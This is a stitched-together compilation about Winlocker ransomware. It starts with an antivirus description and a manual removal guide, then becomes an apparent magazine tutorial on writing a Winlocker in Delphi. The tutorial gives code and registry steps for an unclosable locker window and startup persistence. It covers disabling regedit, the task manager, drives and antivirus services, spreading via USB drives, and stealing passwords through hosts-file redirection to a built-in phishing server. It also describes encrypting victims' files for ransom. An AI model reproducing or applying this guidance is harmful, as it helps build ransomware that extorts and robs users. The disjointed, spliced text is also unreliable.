Winlocker is a type of malware software, which blocks operating system user. Naturally, if this virus gets onto your computer, it immediately starts doing its thing. For example, after infection, it automatically registers itself in the system startup, which means that it automatically starts along with the personal computer. Once launched, Winlocker restricts the user in literally all actions with the computer mouse and keyboard. At the same time, he also asks to send a certain amount of money to the specified account, after payment of which it will supposedly be automatically deleted. Of course, if the user falls for such a trick, no unlocking of the system will occur.
Winlocker mostly has the .exe extension. Moreover, it is usually distributed through various electronic messages that are of interest to the user to one degree or another. An attachment is attached to such a message, which can be either a picture or a video (although in fact it is the same Winlocker). In order not to fall for the trick, the user only needs to be vigilant and at least look at the extension of the file that was sent to him. Typically, images have the following extension - .jpg, .pmg, .gif, etc. Videos, in turn, have .avi, .mp4, .flv, etc. If the file extension does not match these extensions, it is most likely Winlocker (whose extension is .exe).
How to remove Winlocker?
If to your Personal Computer After all, this malware has penetrated, you should first remove it from startup, and only then completely remove it from the PC. First, before proceeding with removal, you should check which functions Winlocker has blocked. To do this, press the hotkey combination Ctrl + Alt + Delete. If these steps do not produce anything, then try launching the Run program using the Win + R combination and entering the regedit command.
It's worth noting that in most cases, none of these commands work. Then you should start the computer in safe mode (after rebooting, press the F8 button). Next in command line the regedit command is also entered and the registry editor is launched. Here you should go to the following branches: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run and HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Run. In these branches you need to remove programs that are unfamiliar to you: hkcmd.exe, igfxtray.exe, igfxpers.exe. Next you need to find the Shell and UserInit parameters, the value of which should include explorer.exe and the path to the userinit.exe file (C:/Windows/system32/userinit.exe), respectively.
Usually, instead of one of these parameters, the path to the malicious file is specified. You need to remember it, and after the correct values have been entered, follow this path, find the file and delete it.
(TROJ_VB.ACD, TR/Dropper.Gen, Trojan.Win32.Sovest.m, BehavesLike:Win32.Malware, Trojan:Win32/Sisproc, Trojan.Agent.JF, KillApp.L, Parser error, Trojan.VB.NID, Generic.cd, Trojan.Win32.Sovest.v, Generic.dx, BackDoor.Generic2.IIE, Trojan:Win32/Bumat!rts, VirTool:Win32/Obfuscator.M, Trojan.Win32.VB.bav, Trojan.Win32. Sovest.g, Backdoor.Pcclient.HR, Trojan Horse, Trojan:Win32/Provis!rts, Generic.BPD, TROJ_AGENT.WPQ, Trojan.Win32.Sovest.k, TROJ_AGENT.ABW, Trojan.Agent.VB.AQG)
Added to the Dr.Web virus database: 2005-09-20
Description added: 2006-01-31
Virus type: Trojan horse
Vulnerable OS:Win NT-based
Size: 119,296 bytes
Packed: -
Technical information
System recovery information
You must contact Doctor Web Technical Support Service to receive instructions on how to restore the system.
Windows macOS Linux Android
- If the operating system is able to boot (in normal mode or failure protection mode), download the Dr.Web CureIt! and use it to execute full check your computer, as well as the portable storage media you use.
- If the operating system cannot boot, change your computer's BIOS settings to allow your PC to boot from a CD or USB drive. Download the image of the Dr.Web® LiveDisk system recovery disk or the Dr.Web® LiveDisk burning utility to a USB drive, and prepare the appropriate media. After booting your computer using this media, run a full scan of it and disinfect detected threats.
- If your mobile device is functioning normally, download and install the free anti-virus product Dr.Web for Android on it Light. Perform a full system scan and use recommendations to neutralize detected threats.
- If your mobile device is blocked by a ransomware Trojan of the Android.Locker family (the screen displays an accusation of breaking the law, a demand for payment of a certain amount of money, or another message that interferes with normal operation of the device), follow these steps:
- boot your smartphone or tablet into safe mode (depending on the version of the operating system and the features of the specific mobile device this procedure can be performed different ways; For clarification, please refer to the instructions supplied with the purchased device, or directly to its manufacturer);
- After activating safe mode, install a free antivirus product on the infected device
IN Lately cases of computer virus infection have become more frequent Trojan.Winlock. Not only did they become more frequent, but a whole epidemic began! Several million computers are infected in Russia, and their number is growing every day. We will try to explain to you how to remove the Trojan.Winlock virus.
To begin with, a little information about the virus itself: how it gets onto the computer, what it does and what are the consequences of its presence on the user’s PC.
Trojan.Winlock virus is a fraudulent Trojan program to extort money from PC users. This virus gets onto your computer mainly through adult sites. Yes, yes, it is the visitors of these sites who are at risk. We can even say that they constitute 98% of all victims. The remaining 2% are visitors to social networks, such as classmates, etc. These figures are not taken from my head, but from experience in working with those affected by this virus.
How does a virus get onto a computer?
Most common way a virus gets on your computer: for example, you often visit adult sites. You go to such a site and are going to watch some video. Click the video play button and a window appears asking you to update the codec or driver or Adobe Flash Player. Of course this is a trick. There are usually 2 buttons in the window - YES and NO. Some immediately press YES, while others, after thinking carefully, because they already have everything installed, press NO. Main rule: BEFORE YOU INSTALL ANYTHING, CHECK IF YOU REALLY MISS IT. In both the first and second cases, you still fell for the trick of the scammers. Only in the first case will you immediately get a virus on your computer, and in the second case, if you clicked NO, this window will appear again. This problem can be solved. Since the pop-up window takes precedence over the browser itself, you will not be able to close the tab with the open site or the browser itself. A combination will help you with this CTRL keys+ALT+DEL. In the appeared "Dispatcher" Windows tasks", go to the "Applications" tab, highlight your browser in the list of running applications, and then click "End task". You can do the same on the “Processes” tab, you just need to find the process here under the name “your_browser_name.exe” and click the “End process” button.
Here are some examples of how the Trojan.Winlock virus spreads.
But what should those who pressed the YES button do and received a malicious virus on their computer? Below you will find a solution on how to remove Trojan.Winlock from your PC.
What does a virus do to a computer and what are the consequences?
Trojan.Winlock blocks the operating room Windows system so that the user cannot take any action to destroy the virus. Usually, this is a window on the entire monitor screen with a fake warning that you are using unlicensed software (by the way, a smart move - it instantly affects the Russian psyche, most software on computers in Russia is not licensed), or your access to your favorite site has expired , something like this (there are hundreds of variations of the virus). There is also a window in the middle of the monitor screen (not the entire screen). But, it is located in such a way that it will be very inconvenient for the user to carry out work to remove the virus, or to search for information on the Internet. Also, in the window there is a request send SMS for a certain short number to unlock the system. The victim's first mistake is complying with the attackers' demands. People send an SMS, a certain amount of money is withdrawn from their account (usually 300 - 500 rubles) and enter the received code into a special text field. Only there is one “but”. Some people receive a code, they enter it and the system is unlocked. But the virus still remains on the victim’s computer and after a while becomes active again. The rest don’t even receive the code, and the money disappears without a trace.
Blocking examples.
The virus complicates the user's work with all sorts of prohibitions, for example: the registry editor, task manager, control panel applets, the Run menu, the command line and much more are prohibited. The Trojan itself, meanwhile, registers itself in the registry, copies itself to certain directories, some varieties blocks the internet. There was a time when Trojan.Winlock had just begun to appear on the Russian Internet. At that time, there were the most primitive versions of the virus: they deleted themselves after a few hours of computer operation; in some versions it was enough to enter seven zeros and the system was freed; they did not appear in Safe Windows mode! If such a Trojan has landed on you, the task of destroying it is simplified, but if the Trojan is of a newer modification, the task is correspondingly more complicated. Consequences of being on the computer Trojan.Winlock may vary: from the cost of sending SMS to attackers, the cost of calling a specialist who will remove this virus for you, to the loss of some data (for example, if you have to reinstall Windows OS) and a non-working Internet connection. It all depends on chance, how lucky you are with your “pet”.
Removing the Trojan.Winlock virus
So, you have become a victim of the Trojan.Winlock virus. What to do?
The described methods for removing a trojan winlock virus require at least basic computer knowledge, so if you are a computer novice, we immediately recommend that you contact computer help!
1. First method. Suitable if the Trojan window on the system is stretched to fill the entire screen. Prohibited: Registry Editor, Task Manager (CTRL + ALT + DEL), Run (WIN + R). You cannot switch to any window on the system. When loading into Safe Mode(when loading the PC, at the moment before the show Windows screensavers, press F8 and select Safe Mode), exactly the same picture as in normal mode system operation. The virus is active there too. Requires boot disk (BootCD, LiveCD). This is the only disadvantage of this method, because not everyone has such disks. But, for me personally, it is more convenient and faster. You can even discard everything that was said above about this method and display one condition - you must have a bootable CD/DVD.
2. Second method. Suitable if you don't have boot disk. And also: the Trojan program window is stretched across the entire screen or in the middle, everything that was listed in the first method is prohibited (or partially prohibited). If you were able to load Safe Mode and virus program it is not displayed - this method is for you.
3. Third method. Suitable if you don't have a boot disk. And also: the Trojan program window is stretched across the entire screen or in the middle, everything that was listed in the first method is prohibited (or partially prohibited). In Safe Mode Windows virus active
After we have decided on the method, we proceed to removal.
The first way to remove a virus
We take a boot disk, its name is not very important, the main thing is that there is an emergency operating system (of course, you can use Norton Commander from a floppy disk if you are lucky, but we are still in the 21st century).
So we need to enable boot from drive before boot from hard drive. This is done in the BIOS settings. When you turn on the computer, at the very beginning you will see the message “Press DEL to enter Setup” (on laptops it is usually written instead of DEL -> F2). After you press the desired key it will load BIOS setup. Using the arrow keys on the keyboard and the Enter key, you need to go to the section Advanced BIOS Features. Further, everything depends on the BIOS manufacturer. In some you need to find the Boot item Device Priority, go into it and configure the device boot priority there. In others, you will immediately find priority settings when you go to the Advanced BIOS Features section. If you have even the slightest English language– you’ll figure it out without any problems. So, you need to find something like this:
1st Boot Device
2nd Boot Device
3rd Boot Device
1st Boot Device - the device that boots first is usually located there HDD(HDD). By pressing Enter (or another key - see the bottom panel in the BIOS) select CD-ROM.
2nd Boot Device – the device that boots second. By pressing Enter (or another key - see the bottom panel in the BIOS) select HDD.
The device is selected. Now you need to save the changes. To do this, return to start menu and select Save and exit Setup. In the window that appears, enter “Y” and press Enter. Insert the disc into the drive. IN right moment When the computer boots, the boot disk will start launching. Emergency operating systems on such disks are different. Some look almost exactly like regular Windows; they have an explorer. Some use it instead of a conductor file manager(For example Total Commander). That's not the point - the main thing is that you can navigate directories and delete files.
Let's start cleaning the system. The most common directories where our Trojan is copied are:
in Windows XP
C:\Documents and Settings\YOUR_ACCOUNT_NAME\Local Settings\Application Data
C:\Documents and Settings\YOUR_ACCOUNT_NAME\Local Settings\Temp
C:\Documents and Settings\YOUR_ACCOUNT_NAME\Local Settings\Temporary Internet Files
in Windows Vista/Windows 7
C:\Users\YOUR_ACCOUNT_NAME\AppData\Roaming
C:\Users\YOUR_ACCOUNT_NAME\AppData\Local\Temp
C:\Users\YOUR_ACCOUNT_NAME\AppData\Local\Microsoft\Windows\Temporary Internet Files
At the root of the 1st path we look for exe and tmp files that are unfamiliar to us. Next, we move on to the most inhabited places of the virus – routes 2 and 3. IN Temp folder select all files and folders and delete. This one is for sure. In the Temporary Internet Files folder, select all the files and delete them. If there are folders there, then delete the files inside those folders. You can also view the paths C:\, C:\Program Files, C:\Documents and Settings\YOUR_ACCOUNT_NAME\Local Settings\Cookies, C:\WINDOWS (often there is a malicious cmon.exe file in C:\WINDOWS, delete it) , but usually cleaning the 2nd and 3rd paths is enough. If there are several users on the computer, then perform the same actions with their accounts for prevention. That's it, cleaning is complete. Now we reboot, pull out the boot disk and wait for moment “X”. Here is the welcome screen, the Desktop starts to load and that’s it, the virus window does not appear. You did everything right. Well, if it appears, it means you didn’t clean it well, load the boot disk again, and go through all the paths again, maybe you missed something. For those who have “lost” Trojan: We deleted the files themselves, but the virus could have left entries in the registry. We need to clean up the system. Go to Start -> Run (WIN + R) and type the command regedit and then press Enter. If the message " Editing the registry is prohibited by the system administrator“, then see the section of the article “Prohibitions”. If everything is fine, then go to the key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. This section stores records of startup programs. current user. These entries appear on the right. Of course, all program names and system files you cannot know, therefore, I advise you to pay attention to the paths to these files, which are displayed in the “Value” field. You can understand that this is a virus along the path, it can lead to the Temp or Temporary Internet Files folder, as well as to Application Data. By the name of the file in the path, you can also understand that it is a virus. The file may be called: ~DFFE93.tmp or 16A8.exe. The record itself can be called anything you like. Very often it is called Microsoft Audio Driver or something like that. The main thing is not the name, but the path and file name, remember this. So, let's say that we didn't find anything suspicious here. Now go to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run section. There are usually more entries here. We check the section for virus entries. And check out 3 more paths (they are all nearby):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
Next, go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. There are several values here where the Trojan could be registered: Userinit, UIHost and Shell. Now let's give examples of how these entries should look by default:
Userinit = C:\WINDOWS\system32\userinit.exe,
UIHost = logonui.exe
Shell = explorer.exe
Check our notes and yours. If there is anything, we fix it. OK it's all over Now. If everything was done correctly, the virus was removed from the computer. But remember one thing - varieties Trojan.Winlock so many. We have given an example of how and where most of these are written and copied Trojans, but there may be differences.
The second way to remove the virus
In this method, we do not have the opportunity to use a boot disk, but the virus is not active in Windows Safe Mode. Everything is simple here. Load Safe Mode (how to do this is described above). We have an almost complete OS. Now we do the same as in the First method, starting with the words: “So, let's start cleaning the system. The most common directories where our Trojan, This:". After completing the steps, reboot the computer and enjoy life (if everything was done correctly).
The third way to remove a virus
This method is for those who are unlucky. You do not have a boot disk; the virus is active in Safe Mode. What to do? To suffer! This is the longest way to remove a virus. If you have a virus window in the middle of the screen, the Start menu is visible and parts of the Desktop are visible. You need to get into My Computer. Next, menu Tools -> Folder Options -> View -> Show hidden files and folders -> OK. If hidden files are not displayed, then the virus has prohibited showing hidden files... To do this, see the “Prohibitions” section of the article. Let's assume that hidden files and folders are displayed. Now you need to do the same as in the First method, after the words: “So, let's start cleaning the system. The most common directories where our Trojan, This:". But there is one catch, the virus window interferes with the display of folders... You will have to resize the windows, drag them back and forth, view the contents in parts. In general, very inconvenient! But there's nothing you can do about it. Call Task Manager? Even if it is allowed, you still won’t see it, because it will be under the virus window. A very unpleasant situation. If you have Process Explorer from Sysinternals, you can try running it. It shows all processes, even hidden ones. You can try to kill the virus process through it. But, again, some varieties prevent files from running at all. So, depending on your luck (if it starts, switch to it using the ALT + TAB key combination. Unlike the Task Manager, it will appear on top of the virus window). And so, in such conditions, you need to clean the system from the virus. Then reboot and clean the registry. Everything should work out, be strong. The next situation is when the virus window is stretched to fill the entire screen. An even worse situation. All called windows remain behind the virus (if you are lucky and get the old version, then you know, they had problems with hiding called windows, and with a little trouble, you can bring the desired window to the foreground. Use ALT + TAB, WIN + D and ingenuity). There is one more trick: hold down WIN + U. The Utility Manager will appear. Here you can enable Magnifier or On-screen keyboard, doesn't matter. The main thing is that when you start, a help window will appear, and in it there will be a link to the Microsoft Web Site, thereby launching the browser. If the Internet is connected, then you can search for some information on the Internet about the virus or download the Dr.Web CureIt! program, or rather, select not “Save”, but “Run”. Scan the system with this program, maybe it will find something, although this trick worked the same way with older versions of the Trojan. If only there was an antivirus that detects and destroys Trojan.Winlock, there would be no price for it... Try restoring the system, in some cases it helps. To do this, you need to run Safe Mode with Command Prompt support. Press F8 during Windows boot(before the logo and progress bar appear). Select Safe Mode with Command Prompt. In the command prompt, you need to enter C:\WINDOWS\system32\Restore\rstrui.exe. Next, follow all the instructions that appear on the screen. You can also edit Windows registry by running the regedit.exe command. What to delete in the registry is written above. But all this may be prohibited by the virus. Try to do everything described above, if things get really bad, then only reinstalling the OS will save you. Better yet, call some computer repair service, spend a little, but solve the problem.
It is no secret that many users are so far from information technology that allowing them to work with such a complex device as a computer is fraught. But how to organize access restriction to a PC? After all, today anyone with at least 10% of their arms growing out of their shoulders can turn on a computer. Fortunately, there is a whole class of programs that help limit user access to various components of the operating system: from a simple ban on playing Solitaire or Minesweeper, to completely blocking Windows.
How does infection occur?
However, not all users agree to voluntarily block their system (I want to focus your attention on the fact that in this article we will not consider the creation of malware). So, often such software is delivered to their machines in the form of a virus. There are extremely many ways to infect a victim. Among them, the most popular are:
1. BROWSER BUGS. It's no secret that one of the goals of a modern virus writer is the user's browser. Useful web services are a dime a dozen, and users, of course, use them. For many, the browser is the most frequently used program, which very rarely closes (it doesn’t close at all for me).
There is no need to go to a fortune teller in search of an answer to the question “through which door is best to break into the user’s system?” Here it is already clear: it is necessary to exploit the vulnerabilities of the most popular browsers. To apply this method, you do not need to have special intelligence. It’s enough to browse security sites, find (if there is one) a suitable layer and design it beautifully for your needs. Fast, easy and free.
2. FLASH. Adobe has been regularly screwing up in recent months. They won't have time to release new version flash player, how hackers manage to discover a critical vulnerability in it. They find them, poke the developers’ noses, but they are in no hurry to correct them.
It is foolish to believe that at the same time the virusmakers will quietly sit on their fifth point and wait for the bug to be patched. They are constantly trying to take advantage of a fresh vulnerability and squeeze the maximum benefit out of it. As a result, it turns out that after you watch a funny video, the system begins to behave strangely.
3. USER NAIVET. When I started preparing this article, for the sake of experiment, I loaded the OS into virtual machine and tried to wander through “dubious” sites. You won’t believe it, but I managed to pick up Winlocker three times, agreeing to install “ latest version» flash player and “special” codecs. To be honest, I was a little shocked, because I thought that such methods no longer worked.
What will we code on?
I thought for a long time about what language to write the examples for this article in, and decided to remember the time-tested Delphi. “So your exe will be about a megabyte!”, you object. You are partly true, but we will solve this problem at the conception stage of the project. All code will be provided in pure API. Accordingly, our animal in compiled form will weigh less than 100 KB. We will lose another couple of tens of kilos by manipulating the bytecode archiver on the resulting binary.
The basis of any Winlocker
The foundation of any Winlocker is a form stretched almost across the entire screen. Moreover, this is not just a large form, but a window that overlaps all the others and does not obey any commands at all. Neither minimize, nor resize, much less terminate the program process. At first glance, it may seem that virus writers have invented know-how, but in reality everything is much simpler. In fact, this is the most ordinary window, for which the display style is set to “on top of all”. To make the window behave like a guerrilla and not respond to user requests, the developers slightly modify the procedure for processing messages from outside.
The modification comes down to banal processing of the WM_SYSCOMMAND message. To be even more precise, in the procedure for processing received messages you only need to declare a check for the WM_SYSCOMMAND message. The funny thing is that in processing this message you don’t have to write any code at all - the form will already stop responding to events in the external environment.
Autostart
The virus must be loaded along with the operating system. There are several ways to ensure your program autoloads. Conventionally, they can be divided into two groups: simple and advanced. There is not enough space in the article to consider the advanced ones, so we will consider only simple ones based on the use of the registry. So, there are several autostart corners in the registry:
- HKLM\Software\Microsoft\Windows\CurrentVersion\Run - programs that are launched when any user logs in start from here.
- HKCU\Software\Microsoft\Windows\Current\Version\Run - a location similar to the previous one, except that the current user’s programs are loaded from here.
- HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - list of programs that are launched before users log in.
- HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run - this registry section is responsible for starting programs added to startup through group policies.
- HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows is another location that contains a list of programs that come with Windows.
- KHLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon - this branch contains a link to the Winlogon, but nothing prevents you from specifying the path to your program.
- Startup folder. Perhaps the most primitive method, but nevertheless, many virus writers use it.
Which of the suggested startup locations should you choose for your creation? There is no exact answer, but it is highly not recommended to bet everything on any one of the proposed options. It is much better to use a combination, that is, register in several places at once. An example of writing to autoload on WinAPI is given in the second box.
We will block you and we will block me!
For example, you can easily designate a program that will launch after the system boots or block the start of a specific application. Almost all operations that are performed through this snap-in modify certain registry keys. If you manage to find out which registry keys are being modified, you can easily change them directly from your program. How to do it? There are two options: use the scientific poke method, or use the ProcessMonitor utility from Mark Russinovich. The second method is clearly cooler, so we advise you to download the utility and start researching.
Registry Editor
Most users are accustomed to editing the registry using the built-in Windows editor regedit registry. Since our virus will make changes to the registry, we need to prevent a careless user from tampering with the registry. There’s no point in him sticking his curious nose where it shouldn’t. The easiest way to solve this problem is to block the launch of the Registry Editor. To block, just create the DisableRegistryTools key with the value 1 in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System branch.
Task Manager
Without exception, all the winlockers that I saw blocked the launch of the task manager. Well, let's not lag behind them. This feature is implemented by creating the DisableTaskMgr key (dword type) with the value 1 in the same branch as DisableRegistryTools.
Installation and removal of programms
Particularly smart users use the “Add or Remove Programs” applet to try to install antiviruses in the event of a system infection. This can be easily stopped by creating the NoAddRemovePrograms key with a value of 1 (dword type) all in the same section as DisableRegistryTools.
Blocking access to disks
To completely ruin the user’s mood, you can completely block access to the disks present in the system. Let the user not even try to run the antivirus from his flash drive! Let's implement this trick by creating a NoViewOnDrive (dword) key in the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer section. As the value for the key, we specify the bitmask of the disk to be blocked. For example, for drive C it will be 4. If you need to block several drives, their masks will have to be added together. For example, a value of 12 would correspond to drives C (4) and D (8) being locked.
Tip #1: It’s more fun together anywhere
Infected a poor user's computer? Don't forget to take care of his friends! Remember, the wider the virus spreads, the greater the chances of getting money. Having settled on an enemy vehicle, you should not waste time, but try to find a new bridgehead. How to do it? One of the simplest and most effective ways- monitoring and infection of flash drives. Since users constantly use flash drives, it will be easy for our virus to migrate from one system to another. It is easy to determine whether a flash drive is connected. It is enough to write code that processes the WM_DEVICECHANGE event.
In the code in the third box, I used constants and structures that are not described in the modules that come with Delphi. You will have to describe them yourself. I took all the information from MSDN, but you don’t have to worry about it and just get the source of my code on DVD.
Tip #2: your passes will be ours!
What web services does a modern user use? You don’t need to be a rocket scientist to name at least a few of them: mail, Odnoklassniki, VKontakte, facebook, twitter, etc. The list goes on and on. What am I getting at? And besides, being on enemy territory, it would be nice to collect all the passwords. Perhaps they will come in handy in the future. In addition, having such trump cards in hand, it becomes possible to stimulate the victim. For example, having received passwords from various accounts, the author of the virus can use them to change contact information and change passwords to his own. As a result, the real user will end up in a very bad situation. Simply put, he loses his account. This is already much more serious than a blocked desktop, and if so, then the chances of payment for your “services” increase.
The question immediately arises, what is the easiest way to do this? Typically, users store their passwords directly in the browser, so the idea immediately arises of stealing the password storage file. An example of such theft was demonstrated in the article “Evil Computer”. I'll show you alternative way. The idea is to simply modify the hosts. This file contains matches of the “symbolic site address:ip” type. Our program should be able to modify this file and add correspondence for popular web services. “Where are we going to transfer the user?” To do this, you can concoct your own evil website, on which scams from popular services will be located. This method is easy to implement, but if users are massively infected, such sites will probably not survive for long. In this regard, we will abandon the proposed method, and will go a not entirely standard way - we will build a small web server into the virus. In this situation, our redirection destination will be localhost.
For example: 127.0.0.1 www.odnoclassniki.ru
Review edit hosts file We won’t, it’s better to immediately take a look at how to set up your WEB server using Delphi. If you are a regular reader of our magazine, you should be well versed in the Winsock API. At one time, in the Coding section there were articles about writing all kinds of clients (FTP, PROXY, IRC, etc.) using only an api function. I recommend that you pick up the binder and thoroughly familiarize yourself with the topic of the subject (oil - editor's note).
Now, instead of Odnoklassniki.ru, the victim will not end up on the real website of the popular social network, and straight into the clutches of our evil server. Of course, the web server must be polite and display the real page of classmates (read - a scam site, it must be prepared in advance). Well, then everything is simple: the user enters his login information, after which our web server saves it. In order not to be openly scorched, it is advisable to redirect to a page with a warning that the site is in this moment closed for maintenance work. Or, as an option, save and forward the entered data to real classmates.
Trick #3: ecstasy for the user
How do evil programmers encourage users to part with hard-earned paid SMS? Differently. For example, encrypting files that are valuable to him. What files should I pay attention to? It is best to use those on which the victim’s work/study may depend, for example: documents (doc, xls, mdb, ppt, txt), images (jpeg, png, bmp), source texts (php, pas, c, h, cpp , dpr, py, etc.). If the victim wrote thesis or some extremely important report that is due tomorrow, then the attacker has every chance of receiving a monetary reward.
Now let's talk about the technical implementation of this thing. Finding files is done with the FindFirs() and FindNext() functions from the Sysutils module. It’s easy to work with them, but the simplicity of such fast food will negatively affect the figure of our application. Since we don’t need to gain excess weight, we will use more dietary products: FindFirstFile() and FindNextFile(). Working with them is a little more difficult (see example of searching for files on disk), but beauty requires sacrifice.
Encrypting files using Delphi is also quite simple. It all depends on the chosen encryption method. You can simply use ready-made modules, which are a dime a dozen on torry.net and other sites. For example, I came across a good option from one of the Delphi developers. This module implements the following functions:
//File encryption
function FileEncrypt(InFile, OutFile: String;
Key: TWordTriple): boolean;
//File decryption
function FileDecrypt(InFile, OutFile: String;
Key: TWordTriple): boolean;
//Text encryption
function TextEncrypt(const s: string;
Key: TWordTriple): string;
//Text decryption
function TextDecrypt(const s: string;
Key: TWordTriple): string;
//Encryption of "memory"
function MemoryEncrypt(Src: Pointer; SrcSize:
Cardinal;
Target: Pointer; TargetSize: Cardinal;
Key: TWordTriple): boolean;
//Decryption of “memory”
function MemoryDecrypt(Src: Pointer;
SrcSize: Cardinal; Target: Pointer;
TargetSize: Cardinal; Key: TWordTriple): boolean;
The full text of these functions, as well as examples of their use, can be found on our disk.
Tip #4: multiply!
Tip #5: Play hide and seek to the maximum
As practice has shown, the authors of Winlockers do not care much about the safety of their creations. The protection of most representatives of this group of viruses that came across my eyes came down to the banal assignment of an inconspicuous file name. For example: system.exe, user32.exe, csrss.exe, eplorer.exe and so on. I didn’t think that such methods were still in use, but as it turned out, I was mistaken.
I recommend that you do not neglect security, but consider several different algorithms:
- Give the virus file an inconspicuous name. Although this is a primitive rule, it is highly advisable to follow it.
- Remove the virus from the list of processes. This can be achieved by understanding interception API functions. We have already written many times about API interception. Be sure to re-read these articles!
- Use several autoload methods.
Trick #6: kill at the start
Don't be lazy and write the procedure forced termination processes. It will definitely help you protect your brainchild from the evil antiviruses that the user will try to run. The ideal is to generally intercept functions used to launch programs and prevent them from working normally.
Work complete
Writing WinLocker and making a few hundred bucks on it is more than possible. Users still do not think about security and, if a sensitive situation arises, they are ready to send the treasured SMS rather than strain their brains. I showed you the most primitive skeleton of Winlocker. In principle, bringing it to combat condition is a matter of several hours. But is it necessary to do this? The choice is yours! The main thing is not to forget that writing and distributing viruses is a criminal offense for which you can get a real prison sentence. Of course, I won’t give you the source code for the full virus. No, not because I'm greedy. These viruses are already annoying everyone, so I sure as hell don’t want there to be even more of them after this article. In addition, I don’t want to read news about how law enforcement agencies detained the latest creators of terrible viruses :).
Homemade web server
var
_buff: array of char;
_request:string;
_temp: string;
_path: string;
_FileStream: TFileStream;
begin
Recv(_client, _buff, 1024, 0);
_request:=string(_buff);
_path:= GetFilePath(Copy
(_request, 1, pos(#13, _request)));
_path:= ReplaceSlash(_path);
if ((_path = "") or (_path = "\")) Then
_path:= DocumentRoot + "\" + DirectoryIndex;
( else
if ((_path = "\")) Then
_path:= DocumentRoot + "\" +
DirectoryIndex; )
if (FileExists(_Path)) Then
begin
_FileStream:=
TFileStream.Create(_Path, fmOpenRead);
SendStr(_Client, "HTTP/1.0 200 OK");
SendStr(_Client, "Server: xSrV");
SendStr(_Client, "Content-Length:" +
IntToStr(_FileStream.Size));
SendStr(_Client, "Content-Type: "
+ GetTypeContent(_Path));
SendStr(_Client, "Connection: close");
SendStr(_Client, "");
SendFile(_Client, _FileStream);
_FileStream.Free;
End
//Cut out
Limiting the launch of applications
Using the registry, it is possible to determine the list of programs approved for launch. If this list is specified, the user will not be able to launch applications that are not in it. The list of applications approved for launch is set here: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\ RistrictRun. Having created keys in this section (type REG_SZ) for each allowed program, you will need to go up one level and add the RestrictRun parameter of type dword with a value of 1.
Computer management
A user can do a lot of bad things if he has access to launch the Computer Management snap-in. You cannot completely disable the snap-in using the registry, but you can remove the link to launch it from context menu the “My Computer” shortcut is a piece of cake. All you need to do is create a NoManageMyComputerVerb parameter of type dword with a value of 1 in the HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer section.
We turn off services
Using the capabilities of the registry, you can easily disable services that the user does not need (for example, antiviruses). The complete list of services installed on the system is located in the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services branch. To deactivate the service, edit the value of the start key. For example, to set the “Startup type” service to “manual”, the start key must be set to 3. If you want your software to last longer in an enemy system, then I advise you to maintain a database of antivirus services in your creation. That is, you need to clearly identify antivirus services and change their startup type.
What else do we need?
We have looked at the typical functions of any Winlocker, now it’s time to think about how to improve our brainchild. To be honest, I don’t understand why professional virus writers don’t embed additional useful features. After all, there is no guarantee that the user will reach for his mobile phone and send the treasured SMS to a short number, thereby enriching the author of the virus. But there is always a chance to take the user away from the car useful information: passwords for various services, documents, recorded Skype conversations, etc. We will not introduce any restrictions, but will upgrade our software according to full program. So, below I have described six features that would be useful to implement in such a “project”.
Monitoring flash drives
var
disk:DWORD;
begin
case Msg.WParam of
DBT_DEVICEARRIVAL: //If you connected a flash drive
begin
//Trying to determine the drive letter
disk:= PDEV_BROADAST_VOLUME(Msg.LParam" ")^
.dbcv_unitmask;
//Execute our malicious code
end;
DBT_DEVICEREMOVECOMPLETE: //If the flash drive is removed
if (PDEV_BROADCAST_HDR(Msg.LParam)^
.dbch_devicetype = DBT_DEVTYP_VOLUME) then
begin
//The flash drive has been mounted
end;
Unclosed window on WINDOWS API
wc.cbSize:=sizeof(wc);
wc.style:=cs_hredraw or cs_vredraw;
wc.lpfnWndProc:=@WindowProc;
wc.cbClsExtra:=0;
wc.cbWndExtra:=0;
wc.hInstance:=HInstance;
wc.hIcon:=LoadIcon(0,idi_application);
wc.hCursor:=LoadCursor(0,idc_arrow);
wc.hbrBackground:=COLOR_BTNFACE+1;
wc.lpszMenuName:=nil;
wc.lpszClassName:=’win_main’;
RegisterClassEx(wc);
leftPos:=20;
topPos:=0;
windowWidth:=Screen.Width;
WindowHeight:=Screen.Height;
MainWnd:=CreateWindowEx(
0,
'win_main',
'test',
ws_overlappedwindow,
leftPos,
topPos,
windowWidth,
windowHeight,
0,
0,
Hinstance,
nil
);
SetWindowLong(MainWnd, GWL_HWNDPARENT,
GetDesktopWindow);
SetWindowPos(MainWnd, HWND_TOPMOST,
0, 0, 0, 0, SWP_NOMOVE or SWP_NOSIZE);
ShowWindow(MainWnd, CmdShow);
While GetMessage(Mesg,0,0,0) do
begin
TranslateMessage(Mesg);
DispatchMessage(Mesg);
end;
WINAPI for working with the registry
var
Key: HKey;
begin
//You can substitute one of the paths here
startup.
RegOpenKey(HKEY_LOCAL_MACHINE,
PChar(''), Key);
RegSetValueEx(Key,PChar(paramstr(0)),
0, REG_SZ,
pchar(paramstr(0)),
lstrlen(pchar(paramstr(0)))+1);
RegCloseKey(Key);
end;
“Oh, that’s exactly what the picture was like! Even the number is the same,” the next “victim” almost joyfully “recognized” the virus.
Those who repair computers, have you ever noticed that sometimes when you show up, a broken computer suddenly starts working as if nothing had happened? And involuntarily someone looks at you with fear and respect or even jokes.
